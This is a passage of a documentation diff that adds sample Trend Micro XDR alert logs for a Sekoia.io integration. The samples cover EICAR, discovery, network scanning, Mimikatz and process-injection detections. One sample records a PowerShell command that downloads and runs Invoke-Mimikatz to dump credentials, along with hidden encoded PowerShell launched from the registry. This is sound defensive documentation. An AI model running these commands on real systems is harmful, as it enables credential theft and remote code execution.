@@ -0,0 +1,2339 @@ + +### Raw Events Samples + +In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. + + +=== "test_eicar_test_file_detection" + + + ```json + { + "schemaVersion": "1.15", + "id": "WB-11111-22222222-00000", + "investigationStatus": "New", + "status": "Open", + "investigationResult": "No Findings", + "workbenchLink": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000", + "alertProvider": "SAE", + "modelId": "dee5c874-1032-4f7a-baec-8ed1ef0be1af", + "model": "Eicar Test File Detection", + "modelType": "preset", + "score": 20, + "severity": "low", + "createdDateTime": "2024-11-26T16:51:29Z", + "updatedDateTime": "2024-11-26T16:51:29Z", + "ownerIds": [], + "impactScope": { + "desktopCount": 1, + "serverCount": 0, + "accountCount": 0, + "emailAddressCount": 0, + "containerCount": 0, + "cloudIdentityCount": 0, + "entities": [ + { + "entityType": "host", + "entityValue": { + "guid": "ecede9e8-407e-4f34-9747-4a145c247ad5", + "name": "windows10", + "ips": [ + "10.0.0.6" + ] + }, + "entityId": "ecede9e8-407e-4f34-9747-4a145c247ad5", + "relatedEntities": [], + "relatedIndicatorIds": [ + 1, + 2, + 3, + 4, + 5, + 6 + ], + "provenance": [ + "Alert" + ], + "managementScopeGroupId": "110299e0-d3a0-499f-9ec3-e35ab5c2c702" + } + ] + }, + "description": "Eicar test file is detected in the system.", + "matchedRules": [ + { + "id": "1ce01ccb-d930-4a1f-9e64-c1a117344f32", + "name": "Eicar Test File Detection", + "matchedFilters": [ + { + "id": "4c2fd712-e89a-440a-b789-9bfcd8afd443", + "name": "VSAPI Eicar Detection", + "matchedDateTime": "2024-11-26T16:44:04.000Z", + "mitreTechniqueIds": [], + "matchedEvents": [ + { + "uuid": "2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd", + 
"matchedDateTime": "2024-11-26T16:44:04.000Z", + "type": "PRODUCT_EVENT_LOG" + } + ] + } + ] + } + ], + "indicators": [ + { + "id": 1, + "type": "detection_name", + "field": "malName", + "value": "Eicar_test_1", + "relatedEntities": [ + "ecede9e8-407e-4f34-9747-4a145c247ad5" + ], + "filterIds": [ + "4c2fd712-e89a-440a-b789-9bfcd8afd443" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 2, + "type": "file_sha1", + "field": "fileHash", + "value": "667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8", + "relatedEntities": [ + "ecede9e8-407e-4f34-9747-4a145c247ad5" + ], + "filterIds": [ + "4c2fd712-e89a-440a-b789-9bfcd8afd443" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 3, + "type": "filename", + "field": "fileName", + "value": "eicar-com.txt", + "relatedEntities": [ + "ecede9e8-407e-4f34-9747-4a145c247ad5" + ], + "filterIds": [ + "4c2fd712-e89a-440a-b789-9bfcd8afd443" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 4, + "type": "fullpath", + "field": "fullPath", + "value": "C:\\Users\\jdoe\\Downloads\\eicar-com.txt", + "relatedEntities": [ + "ecede9e8-407e-4f34-9747-4a145c247ad5" + ], + "filterIds": [ + "4c2fd712-e89a-440a-b789-9bfcd8afd443" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 5, + "type": "text", + "field": "endpointHostName", + "value": "WINDOWS10", + "relatedEntities": [ + "ecede9e8-407e-4f34-9747-4a145c247ad5" + ], + "filterIds": [ + "4c2fd712-e89a-440a-b789-9bfcd8afd443" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 6, + "type": "text", + "field": "actResult", + "value": "File quarantined", + "relatedEntities": [ + "ecede9e8-407e-4f34-9747-4a145c247ad5" + ], + "filterIds": [ + "4c2fd712-e89a-440a-b789-9bfcd8afd443" + ], + "provenance": [ + "Alert" + ] + } + ] + } + ``` + + + +=== "test_information_gathering" + + + ```json + { + "schemaVersion": "1.15", + "id": "WB-11111-22222222-00000", + "investigationStatus": "New", + "status": "Open", + "investigationResult": "No Findings", + "workbenchLink": 
"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000", + "alertProvider": "SAE", + "modelId": "b4e0f834-178b-4a3d-a5ef-d44c603d1a48", + "model": "Potential Information Gathering", + "modelType": "preset", + "score": 22, + "severity": "low", + "createdDateTime": "2024-11-26T16:48:06Z", + "updatedDateTime": "2024-11-26T16:48:06Z", + "ownerIds": [], + "impactScope": { + "desktopCount": 1, + "serverCount": 0, + "accountCount": 1, + "emailAddressCount": 0, + "containerCount": 0, + "cloudIdentityCount": 0, + "entities": [ + { + "entityType": "account", + "entityValue": "windows10\\jdoe", + "entityId": "windows10\\jdoe", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "relatedIndicatorIds": [], + "provenance": [ + "Alert" + ] + }, + { + "entityType": "host", + "entityValue": { + "guid": "7b00c266-f17f-439f-bb94-3945d463a78b", + "name": "windows10", + "ips": [ + "10.0.0.6" + ] + }, + "entityId": "7b00c266-f17f-439f-bb94-3945d463a78b", + "relatedEntities": [ + "windows10\\jdoe" + ], + "relatedIndicatorIds": [ + 1, + 2, + 3, + 4, + 5, + 6, + 7, + 8, + 9, + 10, + 11, + 12, + 13, + 14, + 15, + 16, + 17, + 18, + 19, + 20 + ], + "provenance": [ + "Alert" + ], + "managementScopeGroupId": "7f56b5b6-4fba-42b1-a1c8-d4fa64300f4a" + } + ] + }, + "description": "A process has executed multiple discovery tools.", + "matchedRules": [ + { + "id": "1be9b378-eb8a-4736-92ba-55c184b2ca55", + "name": "Potential Information Gathering", + "matchedFilters": [ + { + "id": "7062d4bd-33ca-4634-8f04-a7e4e8698548", + "name": "WhoAmI Execution", + "matchedDateTime": "2024-11-26T16:41:05.352Z", + "mitreTechniqueIds": [ + "T1033" + ], + "matchedEvents": [ + { + "uuid": "54955525-b5ac-4b31-b5b7-0e03ba25aa4a", + "matchedDateTime": "2024-11-26T16:41:05.352Z", + "type": "TELEMETRY_PROCESS" + } + ] + }, + { + "id": "3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb", + "name": "IPconfig Execution", + "matchedDateTime": "2024-11-26T16:44:46.602Z", + 
"mitreTechniqueIds": [ + "T1016" + ], + "matchedEvents": [ + { + "uuid": "7a733f00-faa0-4ac2-b97c-34d8f3ffd230", + "matchedDateTime": "2024-11-26T16:44:46.602Z", + "type": "TELEMETRY_PROCESS" + } + ] + } + ] + } + ], + "indicators": [ + { + "id": 1, + "type": "command_line", + "field": "objectCmd", + "value": "\"C:\\Windows\\system32\\whoami.exe\"", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "7062d4bd-33ca-4634-8f04-a7e4e8698548" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 2, + "type": "command_line", + "field": "processCmd", + "value": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "7062d4bd-33ca-4634-8f04-a7e4e8698548" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 3, + "type": "command_line", + "field": "parentCmd", + "value": "C:\\Windows\\Explorer.EXE", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "7062d4bd-33ca-4634-8f04-a7e4e8698548" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 4, + "type": "command_line", + "field": "objectCmd", + "value": "\"C:\\Windows\\system32\\ipconfig.exe\" /all ", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 5, + "type": "command_line", + "field": "processCmd", + "value": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 6, + "type": "command_line", + "field": "parentCmd", + "value": "C:\\Windows\\Explorer.EXE", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb" + ], + "provenance": [ + "Alert" + ] 
+ }, + { + "id": 7, + "type": "file_sha1", + "field": "processFileHashSha1", + "value": "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "7062d4bd-33ca-4634-8f04-a7e4e8698548" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 8, + "type": "file_sha1", + "field": "processFileHashSha1", + "value": "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 9, + "type": "file_sha256", + "field": "parentFileHashSha256", + "value": "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "7062d4bd-33ca-4634-8f04-a7e4e8698548" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 10, + "type": "file_sha256", + "field": "processFileHashSha256", + "value": "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "7062d4bd-33ca-4634-8f04-a7e4e8698548" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 11, + "type": "file_sha256", + "field": "parentFileHashSha256", + "value": "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 12, + "type": "file_sha256", + "field": "processFileHashSha256", + "value": "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 13, + "type": "fullpath", + "field": "processFilePath", + "value": 
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "7062d4bd-33ca-4634-8f04-a7e4e8698548" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 14, + "type": "fullpath", + "field": "parentFilePath", + "value": "C:\\Windows\\explorer.exe", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "7062d4bd-33ca-4634-8f04-a7e4e8698548" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 15, + "type": "fullpath", + "field": "processFilePath", + "value": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 16, + "type": "fullpath", + "field": "parentFilePath", + "value": "C:\\Windows\\explorer.exe", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 17, + "type": "process_id", + "field": "processPid", + "value": "5040", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "7062d4bd-33ca-4634-8f04-a7e4e8698548" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 18, + "type": "process_id", + "field": "parentPid", + "value": "9920", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "7062d4bd-33ca-4634-8f04-a7e4e8698548" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 19, + "type": "process_id", + "field": "processPid", + "value": "5040", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 20, + "type": "process_id", + "field": "parentPid", + "value": "9920", + "relatedEntities": [ + 
"7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb" + ], + "provenance": [ + "Alert" + ] + } + ] + } + ``` + + + +=== "test_internal_network_scanner" + + + ```json + { + "schemaVersion": "1.15", + "id": "WB-11111-22222222-00000", + "investigationStatus": "New", + "status": "Open", + "investigationResult": "No Findings", + "workbenchLink": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509", + "alertProvider": "SAE", + "modelId": "fc93e58b-142a-46bd-89b3-0670004728da", + "model": "Internal Network Scanner", + "modelType": "preset", + "score": 22, + "severity": "low", + "createdDateTime": "2024-07-23T14:46:11Z", + "updatedDateTime": "2024-07-23T14:46:11Z", + "ownerIds": [], + "impactScope": { + "desktopCount": 1, + "serverCount": 0, + "accountCount": 1, + "emailAddressCount": 0, + "containerCount": 0, + "cloudIdentityCount": 0, + "entities": [ + { + "entityType": "account", + "entityValue": "john\\doe", + "entityId": "john\\doe", + "relatedEntities": [ + "3F783642-C0D0-4AFD-84B6-F6751E5BF80F" + ], + "relatedIndicatorIds": [], + "provenance": [ + "Alert" + ] + }, + { + "entityType": "host", + "entityValue": { + "guid": "3F783642-C0D0-4AFD-84B6-F6751E5BF80F", + "name": "doe10", + "ips": [ + "1.2.3.4" + ] + }, + "entityId": "3F783642-C0D0-4AFD-84B6-F6751E5BF80F", + "relatedEntities": [ + "john\\doe" + ], + "relatedIndicatorIds": [ + 1, + 2, + 3, + 4, + 5, + 6, + 7, + 8 + ], + "provenance": [ + "Sweeping", + "Alert" + ], + "managementScopeGroupId": "a008286d-c35c-4b85-85bb-6c744b27c2e7" + } + ] + }, + "description": "Detects usage of network scanner to gather information", + "matchedRules": [ + { + "id": "1382c167-1c06-4312-89bd-2db0573a0a3e", + "name": "Internal Network Scanning", + "matchedFilters": [ + { + "id": "95fa94aa-126d-40a1-92dd-e4427da20897", + "name": "Internal Network Scanning via Famatech Scanner Tools", + "matchedDateTime": 
"2024-07-23T14:41:48.126Z", + "mitreTechniqueIds": [ + "T1046" + ], + "matchedEvents": [ + { + "uuid": "47028c1b-ba5b-45ec-98b0-2f62b8ee1665", + "matchedDateTime": "2024-07-23T14:41:48.126Z", + "type": "TELEMETRY_PROCESS" + } + ] + } + ] + } + ], + "indicators": [ + { + "id": 1, + "type": "command_line", + "field": "processCmd", + "value": "C:\\WINDOWS\\Explorer.EXE", + "relatedEntities": [ + "3F783642-C0D0-4AFD-84B6-F6751E5BF80F" + ], + "filterIds": [ + "95fa94aa-126d-40a1-92dd-e4427da20897" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 2, + "type": "command_line", + "field": "objectCmd", + "value": "\"C:\\Users\\doe.john\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe\" ", + "relatedEntities": [ + "3F783642-C0D0-4AFD-84B6-F6751E5BF80F" + ], + "filterIds": [ + "95fa94aa-126d-40a1-92dd-e4427da20897" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 3, + "type": "file_sha256", + "field": "objectFileHashSha256", + "value": "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1", + "relatedEntities": [ + "3F783642-C0D0-4AFD-84B6-F6751E5BF80F" + ], + "filterIds": [ + "95fa94aa-126d-40a1-92dd-e4427da20897" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 4, + "type": "file_sha256", + "field": "processFileHashSha256", + "value": "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631", + "relatedEntities": [ + "3F783642-C0D0-4AFD-84B6-F6751E5BF80F" + ], + "filterIds": [ + "95fa94aa-126d-40a1-92dd-e4427da20897" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 5, + "type": "fullpath", + "field": "processFilePath", + "value": "C:\\Windows\\explorer.exe", + "relatedEntities": [ + "3F783642-C0D0-4AFD-84B6-F6751E5BF80F" + ], + "filterIds": [ + "95fa94aa-126d-40a1-92dd-e4427da20897" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 6, + "type": "fullpath", + "field": "objectFilePath", + "value": "C:\\Users\\doe.john\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe", + "relatedEntities": [ + "3F783642-C0D0-4AFD-84B6-F6751E5BF80F" + ], 
+ "filterIds": [ + "95fa94aa-126d-40a1-92dd-e4427da20897" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 7, + "type": "user_account", + "field": "logonUser", + "value": "doe", + "relatedEntities": [ + "3F783642-C0D0-4AFD-84B6-F6751E5BF80F" + ], + "filterIds": [ + "95fa94aa-126d-40a1-92dd-e4427da20897" + ], + "provenance": [ + "Related Asset Enrichment", + "Alert" + ] + }, + { + "id": 8, + "type": "user_account", + "field": "", + "value": "Syst\u00e8me", + "relatedEntities": [ + "3F783642-C0D0-4AFD-84B6-F6751E5BF80F" + ], + "filterIds": [], + "provenance": [ + "Related Asset Enrichment" + ] + } + ] + } + ``` + + + +=== "test_process" + + + ```json + { + "schemaVersion": "1.12", + "id": "WB-9002-20220906-00023", + "investigationStatus": "New", + "status": "Open", + "investigationResult": "No Findings", + "workbenchLink": "https://THE_WORKBENCH_URL", + "alertProvider": "SAE", + "modelId": "1ebd4f91-4b28-40b4-87f5-8defee4791d8", + "model": "Credential Dumping via Mimikatz", + "modelType": "preset", + "score": 64, + "severity": "high", + "createdDateTime": "2022-09-06T02:49:30Z", + "updatedDateTime": "2022-09-06T02:49:50Z", + "impactScope": { + "desktopCount": 1, + "serverCount": 0, + "accountCount": 1, + "emailAddressCount": 0, + "containerCount": 0, + "cloudIdentityCount": 0, + "entities": [ + { + "entityType": "account", + "entityValue": "shockwave\\sam", + "entityId": "shockwave\\sam", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "relatedIndicatorIds": [], + "provenance": [ + "Alert" + ] + }, + { + "entityType": "host", + "entityValue": { + "guid": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E", + "name": "nimda", + "ips": [ + "10.10.58.51" + ] + }, + "entityId": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E", + "managementScopeGroupId": "deadbeef-292e-42ae-86be-d2fef483a248", + "managementScopeInstanceId": "1babc299-52de-44f4-a1d2-8a224f391eee", + "managementScopePartitionKey": "4c1850c0-8a2a-4637-9f88-6afbab54dd79", + "relatedEntities": [ + 
"shockwave\\sam" + ], + "relatedIndicatorIds": [ + 1, + 2, + 3, + 4, + 5, + 6, + 7 + ], + "provenance": [ + "Alert" + ] + } + ] + }, + "description": "A user obtained account logon information that can be used to access remote systems via Mimikatz.", + "matchedRules": [ + { + "id": "1288958d-3062-4a75-91fc-51b2a49bc7d7", + "name": "Potential Credential Dumping via Mimikatz", + "matchedFilters": [ + { + "id": "49d327c4-361f-43f0-b66c-cab433495e42", + "name": "Possible Credential Dumping via Mimikatz", + "matchedDateTime": "2022-09-05T03:53:57.199Z", + "mitreTechniqueIds": [ + "V9.T1003.001", + "V9.T1059.003", + "V9.T1212" + ], + "matchedEvents": [ + { + "uuid": "e168a6e5-27b1-462b-ad3e-5146df4e6aa5", + "matchedDateTime": "2022-09-05T03:53:57.199Z", + "type": "TELEMETRY_PROCESS" + } + ] + } + ] + } + ], + "indicators": [ + { + "id": 1, + "type": "command_line", + "field": "objectCmd", + "value": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe \"iex (new-object net.webclient).downloadstring(\" \"https://raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1); invoke-mimikatz -dumpcreds\"", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "49d327c4-361f-43f0-b66c-cab433495e42" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 2, + "type": "command_line", + "field": "processCmd", + "value": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "49d327c4-361f-43f0-b66c-cab433495e42" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 3, + "type": "command_line", + "field": "parentCmd", + "value": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\microsoft\\windows update).update); powershell -nop -noni -w hidden -enc $x", + "relatedEntities": [ 
+ "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "49d327c4-361f-43f0-b66c-cab433495e42" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 4, + "type": "file_sha1", + "field": "objectFileHashSha1", + "value": "1B3B40FBC889FD4C645CC12C85D0805AC36BA254", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "49d327c4-361f-43f0-b66c-cab433495e42" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 5, + "type": "fullpath", + "field": "objectFilePath", + "value": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "49d327c4-361f-43f0-b66c-cab433495e42" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 6, + "type": "fullpath", + "field": "processFilePath", + "value": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "49d327c4-361f-43f0-b66c-cab433495e42" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 7, + "type": "text", + "field": "endpointHostName", + "value": "Nimda", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "49d327c4-361f-43f0-b66c-cab433495e42" + ], + "provenance": [ + "Alert" + ] + } + ] + } + ``` + + + +=== "test_project_injection" + + + ```json + { + "schemaVersion": "1.15", + "id": "WB-11111-22222222-00000", + "investigationStatus": "New", + "status": "Open", + "investigationResult": "No Findings", + "workbenchLink": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3", + "alertProvider": "SAE", + "modelId": "bec297c0-7e55-488e-b02a-192a87069661", + "model": "Process Injection from Windows Temporary Location to System32", + "modelType": "preset", + "score": 51, + "severity": "medium", + "createdDateTime": "2024-07-23T07:49:48Z", + "updatedDateTime": 
"2024-07-23T07:49:59Z", + "ownerIds": [], + "incidentId": "IC-14558-20240722-00000", + "impactScope": { + "desktopCount": 14, + "serverCount": 1, + "accountCount": 1, + "emailAddressCount": 0, + "containerCount": 0, + "cloudIdentityCount": 0, + "entities": [ + { + "entityType": "account", + "entityValue": "windows10\\jdoe", + "entityId": "windows10\\jdoe", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "relatedIndicatorIds": [], + "provenance": [ + "Alert" + ] + }, + { + "entityType": "host", + "entityValue": { + "guid": "7E8FDBEF-FFF7-4C41-9E33-171366D30299", + "name": "CHTX-XMEDICA-2K12.windows10.local", + "ips": [ + "19.112.87.74" + ] + }, + "entityId": "7E8FDBEF-FFF7-4C41-9E33-171366D30299", + "relatedEntities": [], + "relatedIndicatorIds": [ + 1, + 5, + 7 + ], + "provenance": [ + "Sweeping" + ], + "managementScopeGroupId": "4283bdf5-a191-4df8-bf2e-f6dc17c16ff0" + }, + { + "entityType": "host", + "entityValue": { + "guid": "E991724A-42D2-44F9-B122-40290A2E9E15", + "name": "PRESTATAIR-2K19", + "ips": [ + "1.231.184.40" + ] + }, + "entityId": "E991724A-42D2-44F9-B122-40290A2E9E15", + "relatedEntities": [ + "windows10\\jdoe" + ], + "relatedIndicatorIds": [ + 1, + 2, + 3, + 4, + 5, + 6, + 7, + 8, + 9, + 10, + 11, + 12, + 13, + 14, + 15, + 16, + 17, + 18, + 19, + 20, + 21, + 22 + ], + "provenance": [ + "Sweeping", + "Alert" + ], + "managementScopeGroupId": "f7566d2b-6522-4f5f-9a92-8e9b72176c8d" + }, + { + "entityType": "host", + "entityValue": { + "guid": "BACF072C-4180-4F3A-B7E0-3E8984282294", + "name": "", + "ips": [ + "" + ] + }, + "entityId": "BACF072C-4180-4F3A-B7E0-3E8984282294", + "relatedEntities": [], + "relatedIndicatorIds": [ + 1, + 5, + 7 + ], + "provenance": [ + "Sweeping" + ] + }, + { + "entityType": "host", + "entityValue": { + "guid": "A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7", + "name": "XBURN-2K16", + "ips": [ + "248.131.28.153" + ] + }, + "entityId": "A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7", + "relatedEntities": [], + 
"relatedIndicatorIds": [ + 1, + 5, + 7 + ], + "provenance": [ + "Sweeping" + ], + "managementScopeGroupId": "f7566d2b-6522-4f5f-9a92-8e9b72176c8d" + }, + { + "entityType": "host", + "entityValue": { + "guid": "9D6BEFC4-70D3-478A-84AF-A06516E32025", + "name": "LB-XMEDICA-2K12", + "ips": [ + "247.47.158.155" + ] + }, + "entityId": "9D6BEFC4-70D3-478A-84AF-A06516E32025", + "relatedEntities": [], + "relatedIndicatorIds": [ + 1, + 5, + 7 + ], + "provenance": [ + "Sweeping" + ], + "managementScopeGroupId": "f7566d2b-6522-4f5f-9a92-8e9b72176c8d" + }, + { + "entityType": "host", + "entityValue": { + "guid": "07C50CDB-F5A9-4368-9035-3173E9580770", + "name": "C2583-SCLITE1-2", + "ips": [ + "174.76.164.124" + ] + }, + "entityId": "07C50CDB-F5A9-4368-9035-3173E9580770", + "relatedEntities": [], + "relatedIndicatorIds": [ + 7 + ], + "provenance": [ + "Sweeping" + ], + "managementScopeGroupId": "f7566d2b-6522-4f5f-9a92-8e9b72176c8d" + }, + { + "entityType": "host", + "entityValue": { + "guid": "D198406E-C84D-4254-8268-F6D02946EFCE", + "name": "MONECHO-2K22", + "ips": [ + "236.2.20.78" + ] + }, + "entityId": "D198406E-C84D-4254-8268-F6D02946EFCE", + "relatedEntities": [], + "relatedIndicatorIds": [ + 1, + 5, + 7 + ], + "provenance": [ + "Sweeping" + ], + "managementScopeGroupId": "f7566d2b-6522-4f5f-9a92-8e9b72176c8d" + }, + { + "entityType": "host", + "entityValue": { + "guid": "4E3230C3-143C-4692-90F6-DA0BEE1A703B", + "name": "DXRECUP-2K19-T.windows10.local", + "ips": [ + "fe80::cd06:59d9:574d:d989%14" + ] + }, + "entityId": "4E3230C3-143C-4692-90F6-DA0BEE1A703B", + "relatedEntities": [], + "relatedIndicatorIds": [ + 1, + 5, + 7 + ], + "provenance": [ + "Sweeping" + ], + "managementScopeGroupId": "4283bdf5-a191-4df8-bf2e-f6dc17c16ff0" + }, + { + "entityType": "host", + "entityValue": { + "guid": "0174C373-64D0-40F9-A95F-7F12933B3A4C", + "name": "XMEDPRINT-2K19", + "ips": [ + "89.67.140.152" + ] + }, + "entityId": "0174C373-64D0-40F9-A95F-7F12933B3A4C", + "relatedEntities": [], 
+ "relatedIndicatorIds": [ + 1, + 5, + 7 + ], + "provenance": [ + "Sweeping" + ], + "managementScopeGroupId": "f7566d2b-6522-4f5f-9a92-8e9b72176c8d" + }, + { + "entityType": "host", + "entityValue": { + "guid": "B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77", + "name": "SCR-2K16", + "ips": [ + "156.39.139.182" + ] + }, + "entityId": "B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77", + "relatedEntities": [], + "relatedIndicatorIds": [ + 7 + ], + "provenance": [ + "Sweeping" + ], + "managementScopeGroupId": "48c7d9d7-54b0-4d1b-8150-3a1657a303d8" + }, + { + "entityType": "host", + "entityValue": { + "guid": "8F56027B-D321-4914-AD72-B97B2888A414", + "name": "ANTARES-2K16", + "ips": [ + "82.9.180.60" + ] + }, + "entityId": "8F56027B-D321-4914-AD72-B97B2888A414", + "relatedEntities": [], + "relatedIndicatorIds": [ + 1, + 5, + 7 + ], + "provenance": [ + "Sweeping" + ], + "managementScopeGroupId": "f7566d2b-6522-4f5f-9a92-8e9b72176c8d" + }, + { + "entityType": "host", + "entityValue": { + "guid": "EFC3BA71-F83B-4ED4-B2EA-5068D3D10104", + "name": "SATIS-2K22", + "ips": [ + "237.154.233.153" + ] + }, + "entityId": "EFC3BA71-F83B-4ED4-B2EA-5068D3D10104", + "relatedEntities": [], + "relatedIndicatorIds": [ + 1, + 5, + 7 + ], + "provenance": [ + "Sweeping" + ], + 